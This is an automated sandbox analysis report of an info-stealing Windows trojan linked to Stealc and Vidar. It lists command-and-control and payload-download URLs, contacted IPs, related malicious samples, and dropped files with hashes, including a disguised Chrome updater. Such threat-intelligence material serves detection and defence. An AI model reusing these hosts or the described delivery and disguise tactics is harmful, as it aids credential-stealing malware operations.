https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gosp.clinicavertigen.com/#	b4s45TboUL.exe, 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://45.91.200.39/eaa194fa594ff9c2.phpsition:	b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmp	false		unknown
https://gosp.clinicavertigen.com/pData	b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://gosp.clinicavertigen.com/tmpp/chrome_131.exen	b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://45.91.200.39/cb9cc10e175e1537/sqlite3.dllqKo	b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sqlite.org/copyright.html.	b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gosp.clinicavertigen.com/	b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://45.91.200.39FHDHDA	b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
87.106.236.48	gosp.clinicavertigen.com	Germany		8560	ONEANDONE-ASBrauerstrasse48DE	false
45.91.200.39	unknown	Netherlands		204601	ON-LINE-DATAServerlocation-NetherlandsDrontenNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1545664
Start date and time:	2024-10-30 19:46:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	44
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	b4s45TboUL.exe renamed because original name is a hash value
Original Sample Name:	b6f6e51f0efa952f3ffcaab9dd5895db.exe
Detection:	MAL
Classification:	mal100.troj.adwa.spyw.evad.winEXE@61/19@2/2
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 89 Number of non-executed functions: 112
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.22
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target HIIDGCGCBF.exe, PID 2828 because there are no executed function
Execution Graph export aborted for target updater.exe, PID 1740 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: b4s45TboUL.exe

Simulations

Behavior and APIs

Time	Type	Description
14:47:20	API Interceptor	1x Sleep call for process: HIIDGCGCBF.exe modified
14:47:21	API Interceptor	19x Sleep call for process: powershell.exe modified
14:47:38	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
87.106.236.48	2DpxPyeiUv.exe	Get hash	malicious	Stealc, Vidar	Browse	campuspersever.es/chrome_93.exe
45.91.200.39	qPNf2kJgzI.exe	Get hash	malicious	Stealc	Browse	45.91.200.39/eaa194fa594ff9c2.php
45.91.200.39	tdnPqG0jmS.exe	Get hash	malicious	Stealc, Vidar	Browse	45.91.200.39/eaa194fa594ff9c2.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gosp.clinicavertigen.com	tdnPqG0jmS.exe	Get hash	malicious	Stealc, Vidar	Browse	87.106.236.48

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ON-LINE-DATAServerlocation-NetherlandsDrontenNL	qPNf2kJgzI.exe	Get hash	malicious	Stealc	Browse	45.91.200.39
	tdnPqG0jmS.exe	Get hash	malicious	Stealc, Vidar	Browse	45.91.200.39
	y3c6AzPbtt.exe	Get hash	malicious	Stealc	Browse	45.88.105.194
	kj5la5X8gv.exe	Get hash	malicious	Stealc	Browse	45.88.105.194
	NGy4YdKSwE.exe	Get hash	malicious	Stealc, Vidar	Browse	45.88.105.194
	5BQwrSLxIZ.exe	Get hash	malicious	Stealc	Browse	45.88.76.238
	WAOfus3Nqk.exe	Get hash	malicious	Stealc	Browse	45.88.76.238
	2DpxPyeiUv.exe	Get hash	malicious	Stealc, Vidar	Browse	45.88.76.238
	5lB5493t9F.exe	Get hash	malicious	Stealc	Browse	77.83.175.105
	JVLkkfzSKW.exe	Get hash	malicious	Stealc, Vidar	Browse	77.83.175.105
ONEANDONE-ASBrauerstrasse48DE	tdnPqG0jmS.exe	Get hash	malicious	Stealc, Vidar	Browse	87.106.236.48
	Payment&WarantyBonds.exe	Get hash	malicious	FormBook	Browse	217.76.156.252
	HSBC Payment Advice.exe	Get hash	malicious	FormBook	Browse	217.160.0.118
	jew.ppc.elf	Get hash	malicious	Mirai	Browse	82.223.130.245
	2DpxPyeiUv.exe	Get hash	malicious	Stealc, Vidar	Browse	87.106.236.48
	1.rtf	Get hash	malicious	Remcos	Browse	217.160.66.193
	ingswhic.doc	Get hash	malicious	Remcos	Browse	217.160.66.193
	Markus-Dokumenten-Kaufvertrag.vbs	Get hash	malicious	GuLoader, Remcos	Browse	217.160.0.121
	Kvidistante.vbs	Get hash	malicious	GuLoader	Browse	217.160.0.163
	2025+Policies_645622_929-5.pdf	Get hash	malicious	Unknown	Browse	82.223.67.146

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	rCommercialoffer_Technicaloffer_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	87.106.236.48
	Justificante de pago.exe	Get hash	malicious	FormBook, GuLoader	Browse	87.106.236.48
	rPO-000172483.exe	Get hash	malicious	FormBook, GuLoader	Browse	87.106.236.48
	rPO-000172483.exe	Get hash	malicious	FormBook, GuLoader	Browse	87.106.236.48
	Ppto.24265.exe	Get hash	malicious	FormBook, GuLoader	Browse	87.106.236.48
	Factura Honorarios 2024-10.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	87.106.236.48
	Stadigheder43.exe	Get hash	malicious	FormBook, GuLoader	Browse	87.106.236.48
	Forreste.exe	Get hash	malicious	FormBook, GuLoader	Browse	87.106.236.48
	Ppto.24265.exe	Get hash	malicious	FormBook, GuLoader	Browse	87.106.236.48
	Fernissagerne.exe	Get hash	malicious	Snake Keylogger	Browse	87.106.236.48

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\Google\Chrome\updater.exe	file.exe	Get hash	malicious	Unknown	Browse
C:\ProgramData\HIIDGCGCBF.exe	file.exe	Get hash	malicious	Unknown	Browse
C:\ProgramData\chrome.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	0T32Kz4dZU.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	tdnPqG0jmS.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\CFIEGDAE

Download File

Process:	C:\Users\user\Desktop\b4s45TboUL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGIEGHJEGHJKFIEBFHJK

Download File

Process:	C:\Users\user\Desktop\b4s45TboUL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Google\Chrome\updater.exe

Download File

Process:	C:\ProgramData\HIIDGCGCBF.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	8662936
Entropy (8bit):	7.927707184368659
Encrypted:	false
SSDEEP:	196608:weeq5JeITAZfUnRGPG+FyWlaYVNcT5qagonrxz/4fBiCY1MFU:u4J48svIiuT5PvQfBi3eFU
MD5:	0F247FC98A73243773ED3614FFAD3118
SHA1:	1BB4ECA56217F784738CB9108F18BF4C6B67F67E
SHA-256:	0CF1E07D9FF27240D711390121E4EA7EB6F84E3C150AE9BB6D860E2819AD61E5
SHA-512:	50414ED73F76AA6280AFF26D1AA7BFD99F49E6D6C8CD9470692674C1414DD9248CBD602028FC62335BC050179807B8290A27924DBD7D87BE620153BB9B56081A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....!g.........."...........l.....X..........@....................................zz....`.................................................B0n.d....Pn.H...................................................(@n.(................................................... &........o.................. ..` .*... ..<....t..............@..@ .l..P....Q.................@... ......m.......R.............@..@ ......m.......R.............@..@ ......n.......R.............@... P.....n.n.....R.............@..@ x.... n.i.....R.............@..B.imports.....0n.......R.............@....tls.........@n.......R..................rsrc........Pn...... R.............@..@.themida..W..`n......$R.............`....boot.....1.......1..$R.............`..`.reloc................................@........................................................

C:\ProgramData\HIIDGCGCBF.exe

Download File

Process:	C:\Users\user\Desktop\b4s45TboUL.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	8662936
Entropy (8bit):	7.927707184368659
Encrypted:	false
SSDEEP:	196608:weeq5JeITAZfUnRGPG+FyWlaYVNcT5qagonrxz/4fBiCY1MFU:u4J48svIiuT5PvQfBi3eFU
MD5:	0F247FC98A73243773ED3614FFAD3118
SHA1:	1BB4ECA56217F784738CB9108F18BF4C6B67F67E
SHA-256:	0CF1E07D9FF27240D711390121E4EA7EB6F84E3C150AE9BB6D860E2819AD61E5
SHA-512:	50414ED73F76AA6280AFF26D1AA7BFD99F49E6D6C8CD9470692674C1414DD9248CBD602028FC62335BC050179807B8290A27924DBD7D87BE620153BB9B56081A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....!g.........."...........l.....X..........@....................................zz....`.................................................B0n.d....Pn.H...................................................(@n.(................................................... &........o.................. ..` .*... ..<....t..............@..@ .l..P....Q.................@... ......m.......R.............@..@ ......m.......R.............@..@ ......n.......R.............@... P.....n.n.....R.............@..@ x.... n.i.....R.............@..B.imports.....0n.......R.............@....tls.........@n.......R..................rsrc........Pn...... R.............@..@.themida..W..`n......$R.............`....boot.....1.......1..$R.............`..`.reloc................................@........................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_b4s45TboUL.exe_a589bf60d6b7d122a21ee24c88f3e8c47bc93e3_7b0b69e2_79af984d-a0ed-4b6e-97d7-779edc4d5bb2\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1819896295361507
Encrypted:	false
SSDEEP:	192:EcGa0rvPOavAjKGZrd2EXJtzuiF3Z24IO8XA:VGhrvPOaYjFRjzuiF3Y4IO8X
MD5:	25A1B61E3B00873C750AA3D1F439437F
SHA1:	43EB6AF6FD87998D5042D056767FD3FA1B0D48BF
SHA-256:	B5B1A770633959DA24C73B3804F97DBF9043F072E5401C3BCECD5E5502979707
SHA-512:	DAD5BFDCCE741BA6F82CB169C7880EDDA478E3409053D528AA57AB111205B2F13B81B809738A200B3C248AB915F99943EAEE61FC0FC3D5F2D8C24E149DFAD228
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.7.8.7.6.4.2.7.7.1.9.8.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.7.8.7.6.4.3.3.5.0.1.0.1.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.a.f.9.8.4.d.-.a.0.e.d.-.4.b.6.e.-.9.7.d.7.-.7.7.9.e.d.c.4.d.5.b.b.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.8.2.e.d.1.f.-.b.8.b.e.-.4.b.0.8.-.b.7.8.7.-.8.9.8.3.8.f.7.5.b.a.9.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.4.s.4.5.T.b.o.U.L...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.9.c.-.0.0.0.1.-.0.0.1.4.-.c.c.c.4.-.1.e.1.9.f.c.2.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.3.8.8.5.d.1.2.3.0.f.e.0.5.9.d.4.c.3.4.0.2.0.3.c.2.4.8.2.f.f.8.0.0.0.0.f.f.f.f.!.0.0.0.0.d.a.d.b.1.1.d.9.0.a.d.b.3.8.d.c.7.9.8.a.c.a.e.7.5.5.0.0.4.e.d.8.e.9.3.b.0.8.8.f.!.b.4.s.4.5.T.b.o.U.L...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7631.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Oct 30 18:47:23 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	68216
Entropy (8bit):	2.690279381947631
Encrypted:	false
SSDEEP:	384:OMpkB2nveWNRk8br1r9LHfFJI5iroUCawQzqIX:Jk0vjNRk8brl9ZJ+i8ILzlX
MD5:	58DC69D98C40411E5DB69ED4859F2BCA
SHA1:	226F4EF8C10D4224D70AB6FB1E51E4997352584A
SHA-256:	6C4C762687D1A316115A9BAFD6AEB74F32C5ACE5E4325E082ED29CFD0220A718
SHA-512:	A9F6030F97A509B1D64DADA650695D12AA432A0070D26B6921C535969E6E0B3D8F6C466EF63109AB26E6D44003475D7E7934085DBD5A90C448D6442F7FB413CD
Malicious:	false
Preview:	MDMP..a..... .......;."g............4...........t#..<............<..........T.......8...........T...........(j..P............*...........,..............................................................................eJ......4-......GenuineIntel............T...........!."g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER778A.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8344
Entropy (8bit):	3.6958659427066847
Encrypted:	false
SSDEEP:	192:R6l7wVeJdh6VH6Y93SUY6gmf2nav3pDt89bfEsfX1m:R6lXJL696YtSUY6gmf2naAf3fI
MD5:	1CDE33264AC772131489A78A6654791D
SHA1:	A1413C7577D6FD6D3B25C1754CB15ABD0DAF3410
SHA-256:	9DA2901992DDC4FD3E403F9E56A91B03F376975E48FE48A09D418FAC313038CE
SHA-512:	D9B8A7AFA618219AF1F5E0EAF229163A7DB6D87D5C1ADEE10C5D8EFA6D9A2CFE868D3FF6A9C59575F7370EF6D3B30E21BCE95CD13A78D23F69A45C4FF25CE8FB
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.5.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER77BA.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4579
Entropy (8bit):	4.46126353681735
Encrypted:	false
SSDEEP:	48:cvIwWl8zs1Jg77aI9peWpW8VYSPYm8M4J2hLfFv+q8lju+ZjczMd:uIjfPI7/f7VvSJKEZgzMd
MD5:	C147FECE12DEBE1370825E3D25EF6913
SHA1:	90045D1881C47AD05CECF503D1BFF39AA0D9C667
SHA-256:	9B7BCAABE58510D86811FCE5F1C996069D1B3F61B3FECE71B9F0A3F9395B5E1A
SHA-512:	E19A3DA0663E300154FDA28AC3A09E1385314E70FEE965AC320FE8F94FF4835D87A256FD8CADB67E70473FF1E0292AE59A62CFE1FFAC2AF92382DE4B183D0E6D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="566510" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER77D7.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	76818
Entropy (8bit):	3.029117860343438
Encrypted:	false
SSDEEP:	768:3iY2Xqf7waF+RJV4MyApvW8Zvvz1VfteHwZBr1Fy/RBosc8l5dy:yofDF+RJiMe8ZDvfcHwfLy/R9c8lDy
MD5:	BCA0C2AE2C629D2025A0121825D8FADC
SHA1:	5DFA664E93BED0A47D83837DAC5B3915645D610F
SHA-256:	4FC1B7B37B08D3DC16E9026EDCC7E85000FC03AEDF798581F483BFDC76FDA9E2
SHA-512:	24CD405C2BE150B85636922BB9F97624926E1A8D29F3607FC4FEB33B61EB7E24CCF17956CCFBF7E5FFDBFF1B4543253E61B7CE8C66172753E6B752CB39185D28
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7826.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6858485747857173
Encrypted:	false
SSDEEP:	96:TiZYWhxHfhZyYxY3WdHLfYEZZatHiZIKKW6w44BXMaf+P5Mi4tmFI9t3:2ZDy2DPGHafm5Miqma9t3
MD5:	F1CBB4476406CAC5031B02B2A9FBBC27
SHA1:	7F28723A365533A554EEE645C5DF2FFA5F4F1492
SHA-256:	F94A8E0BC434A2B0C58F5EFA5EA7D8C449717273FEE2E780132AF0731BE628E7
SHA-512:	7172FBFA413BA7BBD44C4CEEB39500DEDEF301A43F029936BA6825793B9D3CE2FAC77B448D57B3CD11C2C061DCAA06803633E40A15E1BB4B5BFC6257A6177FC6
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\chrome.dll

Download File

Process:	C:\Users\user\Desktop\b4s45TboUL.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	692736
Entropy (8bit):	6.304379785339226
Encrypted:	false
SSDEEP:	12288:Kk5nGNLFzxC+gej5yNcTN+pt+tLK75PL2rn65hYVKKuKOvy/j3t:KMGNL/geFyNcTN+jv75TQn652VBuNyb
MD5:	EDA18948A989176F4EEBB175CE806255
SHA1:	FF22A3D5F5FB705137F233C36622C79EAB995897
SHA-256:	81A4F37C5495800B7CC46AEA6535D9180DADB5C151DB6F1FD1968D1CD8C1EEB4
SHA-512:	160ED9990C37A4753FC0F5111C94414568654AFBEDC05308308197DF2A99594F2D5D8FE511FD2279543A869ED20248E603D88A0B9B8FB119E8E6131B0C52FF85
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
